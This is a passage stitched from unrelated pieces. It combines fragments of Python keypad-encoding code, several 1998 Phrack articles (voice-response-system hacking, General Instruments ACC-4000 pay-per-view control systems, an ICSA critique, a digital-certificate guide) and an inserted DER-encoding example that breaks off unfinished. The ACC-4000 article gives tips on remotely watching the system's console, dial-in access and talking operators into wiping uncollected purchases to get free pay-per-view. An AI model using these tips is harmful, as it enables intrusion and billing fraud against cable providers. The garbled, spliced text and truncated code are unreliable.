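    Letters (case-insensitive) are wrapped in '*' alpha-mode toggles and
    replaced by their two-digit codes; digits pass through unchanged.
    Alpha mode is closed before any digit and at the end of the string.
    """
    out = []
    in_alpha = False
    for ch in text:
        if ch.isdigit():
            if in_alpha:
                out.append(ALPHA_TOGGLE)  # leave alpha mode before a digit
                in_alpha = False
            out.append(ch)
        elif ch.upper() in ALPHA_CODES:
            if not in_alpha:
                out.append(ALPHA_TOGGLE)  # enter alpha mode
                in_alpha = True
            out.append(ALPHA_CODES[ch.upper()])
        else:
            raise ValueError(f"no FAST key sequence for {ch!r}")
    if in_alpha:
        out.append(ALPHA_TOGGLE)          # always close alpha mode
    return "".join(out)


def decode_fast(keys: str) -> str:
    """Inverse of encode_fast.

    '*' toggles alpha mode; inside it, digits are read in pairs and mapped
    back to letters. Raises ValueError on an unknown code, a dangling odd
    digit inside alpha mode, a non-keypad character, or an unclosed '*'.
    """
    out = []
    in_alpha = False
    i = 0
    while i < len(keys):
        ch = keys[i]
        if ch == ALPHA_TOGGLE:
            in_alpha = not in_alpha
            i += 1
        elif not ch.isdigit():
            raise ValueError(f"unexpected key {ch!r} at position {i}")
        elif in_alpha:
            code = keys[i:i + 2]
            if len(code) < 2:
                raise ValueError("odd number of digits inside alpha mode")
            if code not in CODE_TO_LETTER:
                raise ValueError(f"unknown letter code {code}")
            out.append(CODE_TO_LETTER[code])
            i += 2
        else:
            out.append(ch)
            i += 1
    if in_alpha:
        raise ValueError("alpha mode not closed with '*'")
    return "".join(out)


if __name__ == "__main__":
    # The article's own example: Voy866 -> *836393*866
    print(encode_fast("Voy866"))
    print(decode_fast("*836393*866"))
```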


+ Part V +


+ Conclusion + 


Voice Response Systems can be a great deal of fun, and they can be
safely accessed from a public telephone. Don’t play with these from
home. VRSs are a great way to hack without using a computer.


For information on the Teradyne 4Tel VRS System, read the LOD/H 
Technical Journal, Issue #3: File 05 of 11: An Overview of the Teradyne 
4Tel System by Doom Prophet LOD/H. 


----[ EOF 


13.txt Wed Apr 26 09:43:42 2017 1 
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 13 of 20 


[ Pay Per View (you don’t have to) 


-------- [ Cavalier[TNO] 
| Introduction |


General Instruments sells more cable television equipment than any other 
manufacturer. Included in their product range is the ACC-4000. The 
ACC-4000 is a system that controls Pay-Per-View television. 


The ACC-4000 is a PC running SCO Open Desktop v3.0. Earlier ACC-4000s 
ran Interactive Unix. The interface for the ACC-4000 is X-Windows based, 
so you can hack your way to free pron through an attractive GUI. 


The ACC-4000 is often referred to as an addressable system. This means 
that each set-top-box can be addressed independently. This allows every 
subscriber to select their own programming -- and it allows the cable 
television company to bill the subscriber for every television show the 
subscriber selects. 


The cable television signal is normally sent by satellite to a cable 
headend. To translate this into terms that may be more comfortable to 
Phrack readers, the cable head end is similar to a telephone company 
central office. At the headend, the signal is scrambled to make it more 
difficult to view without paying. 


The ACC-4000 then routes the signal from the headend to the appropriate 
set-top-boxes. It does this by merging control information into the data 
stream before the data stream reaches the set-top-boxes. The ACC-4000 
can talk to one-way, FONE-way, and two-way set-top-boxes. The ACC-4000 
works over standard RF cable, fiber optics, microwave, and even 
telephone wiring. 


The ACC-4000 is capable of sending billing information to a cable 
television billing system, such as CableData, CSG, or Wizard. 


The ACC-4000 is a small system. The unit I examined was using a 486DX-50 
processor. Nevertheless, one ACC-4000 can manage a half a million set 
top boxes. 


Often you will find other General Instruments systems connected to the
ACC-4000. A Data Provider Translator system can take input from outside
sources and merge them into the data stream going to the set-top-boxes.
This provides features like program guides, VCR IR codes, weather data,
Near-Video-On-Demand (NVOD) schedules, or even custom logos and menus. A
Message Editor system can be used to create custom "barker" messages for
cable subscribers.


| Automatic Windows |


In addition to the login window, the ACC-4000 opens two other types of 
windows automatically to display information on the console. Using 
Xwatchwin to view these windows remotely can help you figure out what is 
going on with the system. The Windows are: 


Logger Window 
Wire Link X 


The window titled "Logger Window" contains status and error messages. 


The windows titled "Wire Link X" show data going from the ACC-4000 out 
to other systems, usually the billing system. There is one "Wire Link X" 
window for each system the ACC-4000 is feeding data. 


| The Login Window |


The login window is extremely informative and looks something like this:


    ACC4000                                                         Help
    LOGIN                | Login to ACC4000 |

              General Instruments Addressable Control System

    User Name: ####################     Password: ########
    COPYRIGHT (C) 1996. General Instrument Corporation

    Site Number: 866  Geocode: 303  Terminal: tno:0.0  Software Version: V8.66

    Number ANICS Installed: 1           Number of Subscriptions: 16
    Parallel Data Streams: 1            1st Subscription Service Code: 1
    List Maintenance: HOST              Number of Simultaneous Events: 48
    Number List Maps: 8                 1st Event Service Code: 89
    Return Frequency: 08.9 Mhz          Data Stream Baud Rate: 13.97 Khz
    Data Base Size: 288K Subscribers    Converter ID Usage: 32K Groups
    1st group 1-way  2nd group phone  3rd group phone  4th group 2-way
    5th group 2-way  6th group 2-way  7th group 2-way  8th group 2-way
    9th group 2-way

    Enter operator name

    F6:Clear Field    F7:Field Help    F8:Form Help


Site Number is assigned by General Instruments. This number is 
also stored in the set-top-box. 


Geocode is an optional number that may be assigned by the cable
television company to segment its set-top-boxes into groups.


Terminal is the name of the X-windows terminal you are 
connecting from. 


Software Version is the release number of the ACC-4000 software. 


Number ANICS Installed is the number of transmission devices 
installed. 


Parallel Data Streams is the number of simultaneous 
transmissions into the data stream. 


List Maintenance is always set to HOST. In the future, General
Instruments plans to allow an ANIC to maintain the list of
authorizations.


Number List Maps is the size of the queue between the ACC-4000 
and the ANIC. 


Number of Subscriptions is the number of service codes allotted 
for subscriptions. 


1st Subscription Service Code is the first available scrambler
tag for descrambling subscriptions. 


Number of Simultaneous Events is the maximum number of 
Simultaneous Pay-Per-View (PPV) events that can be available at 
one time. 


1st Event Service Code is the first available scrambling tag for
Pay-Per-View PPV events. 


Return Frequency is the transmit frequency used by two-way set
top boxes. The range is normally 8.3 - 10.4 MHz.


Data Stream Baud Rate is the rate of transmission of the data 
stream. 


Data Base Size is the maximum number of set-top-boxes the system 
is configured for. 


Converter ID Usage is always set to 32k. This means that 32k 
set-top-boxes can be grouped into a partition. 


Groups shows the division of the total number of set-top-boxes
(data base size) into partitions. 


| The Main Menu |


The Main Menu is the gateway to all other menus and looks something like
this:


    MAINMENU        | Main Menu of Screen Options |         records found
                      Main Menu of Screen Options
    1. Converters               Convs     7. User Information          Users
    2. Services/Schedules       Svcs      8. Control System Functions  System
    3. Headend Equipment        Headend   9. Reports                   Reports
    4. Converter Types          ConvTyp  10. Data Path Configuration   DataCfg
    5. Data Files               Files    11. Message Management        MsgMgt
    6. Business System Gateway  Gateway  12. Return to Login           Exit

    Enter Selection:

    Enter selection number or press function button

    F6:Clear Field    F7:Field Help    F8:Form Help


| Other Menus |


The ACC-4000 has many other menus that are accessed through the Main Menu.
I will not waste time and space here describing these menus. If you gain
access to an ACC-4000, the online help should be sufficient to aid you
in using the system.


These menus allow you to perform functions such as:


  Managing set-top-boxes
  Managing headend scramblers
  Sending messages to subscribers
  Performing opinion polls on subscribers
  Configuring available Pay-Per-View events
  Managing purchase data
  Maintaining the ACC-4000 database
  Creating reports


| Converter Types |


The ACC-4000 system supports a large number of set-top-boxes:


Type  Model                              Partition                    Type
  1   DRZ (PROM based)                   RCOM II, 400                 One-Way
  2   DRZA-*A, DRZP-*A                   RCOM 450, RCOM 450/P3        One-Way
      (PROM based, 128 tags)
  3   DRZI*-*A (PROM based, 256 tags)    RCOM 450/P3                  One-Way
  4   DRZI*-AT                           RCOM 450                     Two-Way
  5   (model illegible in scan)          RCOM V                       One-Way
  6   XT*5-*2*                           RCOM V                       Two-Way
  7   DRZI*-*AV                          RCOM 450                     One-Way
  8   DP*5-*3*                           RCOM VI+                     Fone-Way
  9   DL4/DL4A                           RCOM V                       One-Way
 10   DP*5-*1*                           RCOM VI+                     One-Way
 11   DP*5-*2*                           RCOM VI+                     Two-Way
 12   DPBB-*1*                           RCOM VI+                     One-Way
 13   DPBB-*3*                           RCOM VI+                     FONE-Way
 14   DPBB-*2*                           RCOM VI+                     Two-Way
 15   DP711*, DPV721*, DPV721*/C1        RCOM 7100/7200               One-Way
 16   DP713*, DPV723*, DPV723*/C1        RCOM 7100/7200               FONE-Way
 17   DP712*, DPV722*, DPV722*/C1        RCOM 7100/7200               Two-Way
 18   DPBB7-*1*                          RCOM 7300                    One-Way
 19   DPBB7-*3*                          RCOM 7300                    FONE-Way
 20   DPBB7-*2*                          RCOM 7300                    Two-Way
 21   DPBB-*1*-M1                        RCOM VI+ M/S                 One-Way
 22   DPBB-*3*-M1                        STARCOM VI+ M/S              FONE-Way
 23   DPBB-*2*-M1                        STARCOM VI+ M/S              Two-Way
 24   IDP7, LMDS-A, MMDS-A/CT1900        IDP7, LMDS-A, MMDS-A/CT1900  One-Way
 25   IDP7, LMDS-A, MMDS-A/CT1900        IDP7, LMDS-A, MMDS-A/CT1900  FONE-Way
 26   IDP7, LMDS-A, MMDS-A/CT1900        IDP7, LMDS-A, MMDS-A/CT1900  Two-Way
 27   DCR                                DCR                          One-Way
 28   DCR 3000S/4000S                    DCR                          One-Way
 30   CFT2000/2100                       CFT2000/2100                 One-Way
 31   CFT2000/2100                       CFT2000/2100                 FONE-Way
 32   CFT2000/2100                       CFT2000/2100                 Two-Way
 33   STARPORT                           STARPORT                     One-Way
 34   STARPORT (not implemented)         STARPORT                     FONE-Way
 35   STARPORT (not implemented)         STARPORT                     Two-Way
 36   CFT2200                            CFT2200                      One-Way
 37   CFT2200                            CFT2200 STARFONE             FONE-Way
 38   CFT2200                            CFT2200 STARVUE              Two-Way
 39   CFT2900                            CFT2900                      One-Way
 40   CFT2900                            CFT2900                      FONE-Way
 41   CFT2900                            CFT2900                      Two-Way
 42   Sega                               Sega                         One-Way


| Scrambler Types |


The ACC-4000 system supports several different types of scramblers at the
headend, including:


  STARPACK Service Encoder (SSE)
     An older scrambler that scrambles with standby and 6dB constant
     sync-suppression scrambling modes.

  Digital Scrambler/Encoder (DS/E)
     An older RF scrambler.

  Digital Video/Encoder (DV/E)
     An older baseband scrambler, used to further scramble DS/E
     signals.

  Video Processor/Encoder (VP/E)
     A DS/E and a DV/E together.

  Modulating Video Processor (MVP) and MVPII
     A newer scrambler.

  Modulating Video Processor (MVP) II-DIU
     A MVPII with a Data Inserter Module (DIM) to enable data insertion.


| Scrambling Modes | 


N , 


The ACC-4000 controls scramblers using several modes of scrambling, including: 


Sync Suppression 
Video Inversion 
Audio Inversion 


Supported sync suppression submodes are:

  Standby
  Clear, 0dB constant
  6dB constant
  10dB constant
  Scene change, 3 seconds
  6/10 pseudo-random, 30 seconds
  6/10 pseudo-random, 1 minute
  6/10 pseudo-random, 16 tics
  6/10 pseudo-random, 3 seconds


When using scene change or 6/10 pseudo-random sync suppression, the 
ACC-4000 supports a number of dynamic mode types: 


Pseudo-random 6/10/clear 
Pseudo-random 6/clear 
Pseudo-random 10/clear 
Pseudo-random 6/10 
Linear 6/10/clear 

Linear 6/clear 

Linear 10/clear 

Linear 6/10 


In addition, you can set the interval between dynamic mode time changes 
in hours, minutes, seconds, or tics. 


Supported video inversion submodes are: 


Clear 

Scene change field inversion 
Constant video inversion 
Timed field inversion 


Note: Video and audio inversion only work with baseband set-top-boxes. 


| Security Notes |


These systems normally have modems for use by both General Instruments
personnel and cable company personnel. General Instruments personnel
dial in to diagnose problems with the system. Cable company personnel
dial in to change Pay-Per-View (PPV) programming or to configure
customer set-top-boxes.


Any uncollected purchases are lost when a set-top-box is initialized. 
To preserve uncollected purchases, the operator will do a Refresh 
instead of an Initialize. If you can talk the operator into doing an 
Initialization instead of a Refresh, any uncollected purchases not 
already forwarded to the billing system will be lost. 


Purchases are stored as integers. Older set-top-boxes were limited to 
storing 16 purchases. Newer set-top-boxes are limited to storing 63 
purchases. 


If you can access a system such as the ACC-4000, you can have great fun. 
Be careful when giving everyone in your city free access to WWF. 


----[ EOF 
[ The International Crime Syndicate Association


-------- [ Dorathea Demming


        =                      ICSA                             =
        =     International Computer Security Association       =
        =                        or                             =
        =     International Crime Syndicate Association?        =
        =                        by                             =
        =                  Dorathea Demming                     =
        =        (c) Dorathea Demming, October, 1997            =


This is an article about computer criminals. I’m not talking about the fun
loving kids of the Farmers of Doom [FOD], the cool pranksters of the Legion of
Doom [LOD], or even the black-tie techno terrorists of The New Order [TNO].
I’m talking about professional computer criminals. I’m talking about the
types of folks that go to work every day and make a living by ripping off
guileless corporations. I’m talking about the International Computer Security
Association [ICSA]. The ICSA has made more money off of computer fraud than
the other three organizations mentioned above combined.


ICSA was previously known as National Computer Security Association [NCSA]. 
It seems that they finally discovered that there are networks and gullible 
corporations in countries other than the United States. 


In this article I will inform you of the cluelessness and greed of ICSA. 
Instead of telling you, I will let them tell you in their own words. 


Let’s look at what the NCSA has to say about its history:


"the company was founded in 1989 to provide independent and 
objective services to a rapidly growing and often confusing 
digital security marketplace through a market-driven, for-profit 
consortium model." 


This is where the ICSA differs from real industry organizations like the IEEE. 
Non-profit organizations like the IEEE can provide independent and objective 
services, for-profit organizations like ICSA cannot be trusted to do so. 

The goal of the NCSA is profit, nothing more and nothing less.


Profit is a desirable goal in a business. However, the ICSA pretends to be 
an industry association. This is a complete and total fabrication. ICSA is 
not an industry association -- it is a for-profit enterprise that competes for 


business directly with the companies it pretends to help. 
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Let’s look at the ICSA’s knowledge of computer security: 


"Early computer security issues focused on virus protection." 


This is where the ICSA accidentally informs us of their true history. No one 
with half of a clue would claim that "Early computer security issues focused 
on virus protection." In reality, early computer security issues focused on 
the protection of mainframe systems. Virus protection did not become a 
concern until the 1980’s. We can only conclude that no one at the ICSA has a 
background in computer security outside of personal computer security. These 
folks seem to be Unix illiterate -- not to speak of VM, MVS, OS/400, AOS/VS, 
VMS or a host of other systems where corporations store vast amounts of data. 
Focusing primarily on PC security will not benefit the overall security 
posture of your organization. 


Let’s look at another baseless claim of the ICSA: 


"ICSA consortia facilitate an open exchange of information among 
security industry product developers and security service 
providers within narrow, but well defined segments of the 
computer security industry." 


According to the "security industry product developers and security service 
providers" that I have spoken with, this is complete hogwash. The word on the 
street is that the ICSA folks collect information and then give nothing useful 
in return. My response is "How could they?" No one at ICSA has any 
information to offer. You would do as well to ask your 12 year old daughter 
for information about computer security -- and you might even do better, if 
your daughter reads Phrack. 


Let’s look at what the ICSA has to say about their Web Certification program: 


"The ICSA Web Certification materially reduces web site risks 
and liability for both operator and visitor by providing, 
verifying and improving the use of logical, physical and 
operational baseline security standards and practices." 


"Comprised of a detailed certification field guide, on-site 
evaluation, remote test, random spot checks, and an evolving set 
of endorsed best practices, ICSA certification uniquely 
demonstrates management’s efforts to assure site availability, 
information protection, and data integrity as well as enhanced 
user confidence and trust." 


What really happens is that ICSA sends out a reseller to your site. The 
reseller then asks you if you have set up your site correctly. You tell the 
reseller that you have, and then the reseller tells ICSA that you have set up 
your site correctly. Very few items are actually verified by the reseller. 

ICSA then runs ISS (Internet Security Scanner) against your web server. If ISS 
cannot detect any security vulnerabilities remotely, you receive ICSA Web 
Certification. 


For grilling your staff with a series of almost meaningless questions, the 
reseller receives $2,975 US dollars. For running ISS against your web server, 
ICSA receives $5,525. For $19.95, you can buy a copy of Computer Security 
Basics by Deborah Russell and G.T. Gangemi Sr. (ISBN:0-937175-71-4) and save 
your company almost $8,500. 


Let’s look at the ICSA’s Reseller Training: 


ICSA states that every reseller that delivers their product is trained in 
computer security. In practice, however, this training is actually _sales_ 
training. The ICSA training course lasts for less than one day and is 
supposed to be conducted by two trainers, one sales person and one technical 
person. One recipient of this training told me that the technical person did 
not bother to show up for his training, while another recipient of this 
training told me that ICSA instead sent _two_ sales people and _no_ technical 
people to his training. 


Let’s look at what ICSA says about change in the "digital world" of 
firewalls: 


"The digital world moves far too quickly to certify only a 
particular version of a product or a particular incarnation of a 
system. Therefore, ICSA certification criteria and processes are 
designed so that once a product or system is certified, all 
future versions of the product (or updates of the system) are 
inherently certified." 


What does this mean to you? It means that ICSA is certifying firewalls 
running code that they have never seen. It means that if you purchase a 
firewall that has been ICSA certified -- you have no way of knowing if the 
version of the firewall product that is protecting your organization has ever 
been certified. 


Let’s look at how ICSA defends itself from such allegations. ICSA has 
three ready-made defenses: 


"First, the ICSA gains a contractual commitment from the 
product vendor or the organization that owns or runs the 
certified system that the product or system will be maintained 
at the current, published ICSA certification standards. " 


So that’s how ICSA certification works: the firewall vendors promise to write 
good code and ICSA gives them a sticker. This works fine with little children 
in Sunday school, but I wouldn’t trust the security of my business to such a 
plan. 


"Secondly, ICSA or its authorized partners normally perform 
random spot checking of the current product (or system) against 
current ICSA criteria for that certification category." 


Except, of course, that an unnamed source within ICSA itself admitted that 
these spot checks are not actually being done. That’s right, these spot 
checks exist only in the minds of the marketing staff of the ICSA. ICSA 
cannot manage to cover the costs of spot checking in their exorbitant fee 
structure. They must be spending the money instead on all of those free 
televisions they are giving away to their resellers. 


"Thirdly, ICSA certification is renewed annually. At renewal 
time, the full certification process is repeated for the current 
production system or shipping products against the current 
criteria. " 


Well here we have the final promise -- our systems will never be out of 
certification for more than 364 days. If our firewall vendor ships three new 
releases a year, at least one of them will go through the actual ICSA 
certification process. Of course, all of them will have the ICSA certification 
sticker. 


Let’s look at what ICSA has to say about their procedures: 


"The certification criteria is not primarily based on 
fundamental design or engineering principles or on an assessment 
of underlying technology. In most cases, we strive to use a 
black-box approach. " 


Listen to what they are really saying here. They are admitting that their 
certification process does not deal with "fundamental design or engineering 
principles" or with an "assessment of underlying technology". What else is left 
to base a certification upon? Do they certify firewalls based upon the 
firewall vendors’ marketing brochures? Upon the color of their product boxes? 
Upon the friendliness of their sales staff? Or maybe they just certify anyone 
who gives them money. 


When you are clueless, every computer system must look like a "black-box" 
to you. 


Let’s look at how the ICSA web certification process deals with CGI 
vulnerabilities: 


"The Site Operator attest that CGIs have been reviewed by 
qualified reviewers against design criteria that affect 
security. " (sic) 


Let’s take a close look at this. The #1 method of breaking into web servers 
is to attack a vulnerable CGI program. And the full extent that the ICSA 
certification deals with secure CGI programming is to have your staff attest 
that they have done a good job. What sort of employee would respond "Oh no, 
we haven’t even looked at the security of those CGI bins?" The ICSA counts on 
employees trying to save their jobs to speed the certification process along 
to its conclusion. 


Let’s look at what ICSA has to say about its own thoroughness: 


"Because it is neither practical nor cost effective, ICSA does 
not test and certify every possible combination of web sites on 
a web server at various locations unless requested to, and 
compensated for, by Customer. " 


We all know that security is breached at its weakest link, not its 
strongest. If we choose to certify only some of our systems, we can only 
assume that attackers will then simply move on and attack our unprotected 
systems. Perhaps if ICSA did not attempt to extort $8,500 for a single web 
server certification, more customers could have all of their web sites 
certified. 


Let’s look at how much faith ICSA puts in their own certifications: 


"Customer shall defend, indemnify, and hold ICSA harmless from 
and against any and all claims or lawsuits of any third party 
and resulting costs (including reasonable attorneys’ fees), 
damages, losses, awards, and judgements based on any claim that 
a ICSA-certified server/site/system was insecure, failed to meet 
any security specifications, or was otherwise unable to 
withstand an actual or simulated penetration." 


In plain English, they are saying that if you get sued, you are on your own. 
But wait, their faithlessness does not stop there: 


Let’s look at how the ICSA sees its legal relationship with its 
customers: 


"Customer, may, upon written notice and approval of ICSA, assume 
the defense of any claim or legal proceeding using counsel of 
its choice. ICSA shall be entitled to participate in, but not 
control, the defense of any such action, with its own counsel 
and at its own expense: provided, that if ICSA, in its sole 
discretion, determines that there exists a conflict of interest 
between Customer and ICSA, ICSA shall have the right to engage 
separate counsel, the reasonable costs of which shall be paid by 
the customer." 


What you, the customer, agree to when you sign up for ICSA certification is 
that you cannot even legally defend yourself in court until you have "written 
notice and approval of ICSA." But it’s even worse than that: ICSA then 
reserves the right to hire lawyers and bill YOU for the expense if it feels 
that you are not sufficiently protecting its interests. Whose corporate 
legal department is going to okay a provision like this? 


Let’s look at how much the ICSA attempts to charge for this garbage: 


Web Certification 

    1 Server                          $8,500 
    2-4 Servers                       $7,650 
    5 or more Servers                 $6,800 
    6-10 DNS                          $  495 
    11 or more DNS                    Su 13.05) 


Perimeter Check 

    up to 15 Devices                  $3,995 
    additional groups of 10 Devices   $1,500 
    bi-monthly reports                $1,000 
    monthly reports                   $3,500 


War Dial 

    first 250 phone lines             $1,000 
    additional lines                  $3/line 


Per Diem 

    Domestic                          $  995 
    International                     $1,995 


Certifying one web server will cost you $8,500. I have seen small web servers 
purchased, installed, and designed for less than that amount. 


If you tell the ICSA that you have 15 network devices visible on the Internet 
and they discover 16 devices, they will bill you an additional $1,500. This 
is what you agree to when you sign an ICSA Perimeter Check contract. In 
effect, when you sign up for an ICSA Perimeter Check, you are agreeing to pay 
unspecified fees. 


To dial an entire prefix the ICSA will charge you $30,250. I wonder if these 
folks are using ToneLoc. I wonder if these fools are even using modems... 


I will leave judgement on the per diem rates to the reader. How much would 
you pay for a clown to entertain at your daughter’s birthday party? Would you 
give the clown a daily per diem of $995? Why would you feel the ICSA clowns 
might deserve better? How do you spend $995 a day and still manage to put in 
some work hours? 


These are just a few excerpts from some ICSA documentation I managed to get my 
hands on. I do not feel my assessment has been any more harsh than these 
people deserve. I am certain that if I had more of their literature, there 
would be even more flagrant examples of ignorance and greed. 


ICSA feeds on business people who are so ignorant as to fall for the ICSA 
propaganda. By masquerading as a legitimate trade organization, they make 
everyone in the data security industry look bad. By overcharging the 
clientele, they drain money from computer security budgets that could better 
be spent on securing systems and educating users. By selling certifications 
with no actual technical validity behind them they fool Internet users into a 
false sense of security when using commerce sites. 


ICSA is good for no one and it is good for nothing. 


Dorathea Demming 
Mechanicsburg, PA 
10 Oct, 1997 


----[ EOF 
----[ Technical Guide to Digital Certification 


--[ Yggdrasil 


Introduction 

Today’s software technology provides not only flexible controls for web pages 
and complex remote interaction (ActiveX controls, Java applets and Netscape 
plugins) but also offers the possibility of downloading pieces of code for 
local execution to extend browsers’ capabilities. A major issue is that 
this code cannot initially be distinguished from malicious code 
(virii/trojans, "man in the middle" attacks, forced downgrade, forgery of 
electronic documents, etc) disguised as utilities. 


The point is that end users do not know who published a piece of software, 
whether the code has been tampered with, or what that software will do (until 
they download and execute it). Anyone can create plugins, applets or controls 
containing this potentially destructive code or even "intelligent" malevolent 
code, able to communicate covertly with a remote server. 


Public-key cryptography has produced a number of different implementations 
to verify the authenticity of software, network objects, documents and data 
transactions (for example, Electronic Funds Transfer) using Digital IDs. 


Authenticode Certifications 

Microsoft recently adopted Authenticode technology to sign their ActiveX 
based software. Any individual or commercial software publisher desiring 
their code to be "trusted" must apply for and receive a Digital Certificate 
from an Authenticode Certificate Authority (CA), such as VeriSign. The CA 
will request proof-of-identity and other information; only then will they 
verify the publisher’s credentials (even employing Dun & Bradstreet rating). 
After the CA has decided that the publisher meets its policy criteria, it 
releases a Certificate (the expected cost is about $500 for a year, plus 
additional costs for hardware storage for commercial developers, up to 
$12,000). 


[ God save the next-generation developers. ] 


A Digital Certificate contains the publisher’s public-key (and other info) 
encoded according to the industry standard X.509 V3 certificate format and 
PKCS #7 signed data standards. 


The ITU-T recommendation for X.509 states that: 


"It would be a serious breach of security if the CA issued a certificate for 
a user with a public key that had been tampered with." 


All Certificates have an expiration time, but the CA may revoke them prior 
to that time if a publisher’s private-key or CA’s certificate is assumed to 
be compromised. The CA may (or may NOT) inform the owner of the certificate. 


Revocation Lists 


The Revocation Lists, also called "black-lists", are held within entries as 
attributes of types CertificateRevocationList and AuthorityRevocationList. 


Their attribute types are defined as follows: 


certificateRevocationList ATTRIBUTE ::= { 
    WITH SYNTAX             CertificateList 
    EQUALITY MATCHING RULE  certificateListExactMatch 
    ID                      id-at-certificateRevocationList } 


authorityRevocationList ATTRIBUTE ::= { 
    WITH SYNTAX             CertificateList 
    EQUALITY MATCHING RULE  certificateListExactMatch 
    ID                      id-at-authorityRevocationList } 


CertificateList ::= SIGNED { SEQUENCE { 
    version                 Version OPTIONAL, 
    signature               AlgorithmIdentifier,             <----+ 
    issuer                  Name,                                 | 
    thisUpdate              UTCTime,                              | 
    nextUpdate              UTCTime OPTIONAL,                     | version 2 
    revokedCertificates     SEQUENCE OF SEQUENCE {                | only 
        userCertificate     CertificateSerialNumber,              | (extension) 
        revocationDate      UTCTime,                              | 
        crlEntryExtensions  Extensions OPTIONAL } OPTIONAL,       | 
    crlExtensions           [0] Extensions OPTIONAL }}       <----+ 


Implementation of X.509-3 

The ITU-T X.509 Directory Specification makes use of a set of cryptographic 
systems known as asymmetric Public-Key Crypto-Systems (PKCS). This system 
involves the use of two keys (one secret and one public as used in common 
public key packages like PGP). 


Both keys can be used for encoding: the private key to decipher if the 
public key was used, and vice versa (Xp*Xs = Xs*Xp, where Xp/Xs are the 
key-encoding/decoding functions). 


When applied to Digital Signatures, the public key encryption is used to 
encipher the data to be signed after it’s passed through a hash function. 
Information is signed by appending to it an enciphered summary of the info. 
The summary is produced by means of a one-way hash function, while the 
enciphering is carried out using the private key of the signer. 


For further information about X.509 and certificate types please read 
the ITU-T Recommendation X.509 ("The Directory: Authentication Framework"). 


Windows Trust API 


To ascertain an object’s reliability under Win32, the WinVerifyTrust() API 
function is used, according to its prototype as follows: 

HRESULT                                   Description 
WINAPI 
WinVerifyTrust ( 
    HWND    hwnd,              <>0 to allow user to assist in trust decision 
    DWORD   dwTrustProvider,   0 = provider unknown, 1 = software publisher 
    DWORD   dwActionID,        specifies what to verify 
    LPVOID  ActionData         information required by the trust provider 
) 


The HRESULT return code will be TRUST_E_SUBJECT_NOT_TRUSTED if the object 
is not trusted (according to the specified action in dwActionID). An error 
code more detailed than this could be provided by the trust provider. 


Creation of a Digitally Signed message 
PKCS #7 specifies several "types", such as ContentInfo, SignedData and 
SignerInfo. Version 1.5 of PKCS #7 describes the ContentInfo type as: 


ContentInfo ::= SEQUENCE { 
    contentType ContentType, 
    content 
        [0] EXPLICIT ANY DEFINED BY contentType OPTIONAL } 


ContentType ::= OBJECT IDENTIFIER 


the content is (or better: MAY be) an octet-stream ASCII string to be passed 
to the selected digest algorithm (an example is MD2, see RFC-1321). 


The first step is to encode the ContentInfo field according to PKCS #7. 
This is the resulting encoded data: 


== DATA BLOCK #1 == 


{30 28} 06 09                        0x0609: contentType = data 
        2A 86 48 86 F7 0D 01 07 01   PKCS #7 data-object ID 
        A0 1B                        [0] EXPLICIT 
        04 [msg_len]                 content = OCTET STRING 
        [octet stream representing 
         the ASCII string, msg_len bytes long]   <-- value (*) 


This (*) data is the input stream to the digest algorithm (MD2 or other): 
(the identifier of the PKCS #7 data object is {1 2 840 113549 1 7 1}) 


== DATA BLOCK #2 == 


{30 20} 30 0C                        0x300C: digestAlgorithm 
        06 08 2A 86 48 86 F7 0D 02 02   algorithm ID = MD2 
        05 00                        parameters = NULL (0x00) 
        04 [block_len]               digest 
        [encoded data (MD2 output)] 


(the object identifier of the MD2 algorithm is {1 2 840 113549 2 2}) 


This data is the encoded DigestInfo. It will be encrypted under RSA using 
the user’s private key. 


According to PKCS #1, RSA encryption has two main steps: an encryption data 
block is constructed from a padding string and the prefixed message digest; 
then the encryption block is exponentiated with the user’s private key. 


The encryption block EB is the following 64-octet string: 


00 01                                          block type 
FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF   padding string 
FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
00                                             separator (0x00) 
[here goes the whole DATA BLOCK #2]            data bytes (prf. message digest) 
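The three encoding steps above (ContentInfo, DigestInfo, and the PKCS #1 block type 01 encryption block), as an added worked example rather than the article's own code: a minimal DER encoder that reproduces the byte layouts of DATA BLOCK #1, DATA BLOCK #2 and EB. The message text and the 16-byte digest value are constructed placeholders (MD2 is not implemented here; the caller supplies the digest), and the 64-octet block size corresponds to the 512-bit modulus assumed on the page.

```python
# Added example: DER encoding of the PKCS #7 / PKCS #1 structures discussed above.
# Not part of the original article. Sample message and digest bytes are constructed.

SEQUENCE, OID, OCTET_STRING, NULL, CONTEXT_0 = 0x30, 0x06, 0x04, 0x05, 0xA0

OID_PKCS7_DATA = "1.2.840.113549.1.7.1"   # {1 2 840 113549 1 7 1}
OID_MD2 = "1.2.840.113549.2.2"            # {1 2 840 113549 2 2}


def der_length(n: int) -> bytes:
    """DER length octets: short form below 128, long form (0x81, 0x82...) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body          # e.g. 0x23D -> 82 02 3D


def tlv(tag: int, value: bytes) -> bytes:
    """Tag-Length-Value triple."""
    return bytes([tag]) + der_length(len(value)) + value


def encode_oid(dotted: str) -> bytes:
    """OID value octets: first two arcs packed as 40*a+b, remaining arcs base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))         # continuation bit on all but last
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def content_info_data(msg: bytes) -> bytes:
    """DATA BLOCK #1: ContentInfo { contentType = data, [0] EXPLICIT OCTET STRING }."""
    return tlv(SEQUENCE,
               tlv(OID, encode_oid(OID_PKCS7_DATA))
               + tlv(CONTEXT_0, tlv(OCTET_STRING, msg)))


def algorithm_identifier(oid: str) -> bytes:
    """AlgorithmIdentifier with NULL parameters (05 00)."""
    return tlv(SEQUENCE, tlv(OID, encode_oid(oid)) + tlv(NULL, b""))


def digest_info(digest: bytes, oid: str = OID_MD2) -> bytes:
    """DATA BLOCK #2: DigestInfo { digestAlgorithm, digest }."""
    return tlv(SEQUENCE, algorithm_identifier(oid) + tlv(OCTET_STRING, digest))


def encryption_block(data: bytes, k: int = 64) -> bytes:
    """PKCS #1 v1.5 block type 01: 00 01 FF..FF 00 data, exactly k octets (modulus size).

    PKCS #1 requires at least eight padding octets; a digest too long for the
    modulus is rejected instead of silently producing a malformed block.
    """
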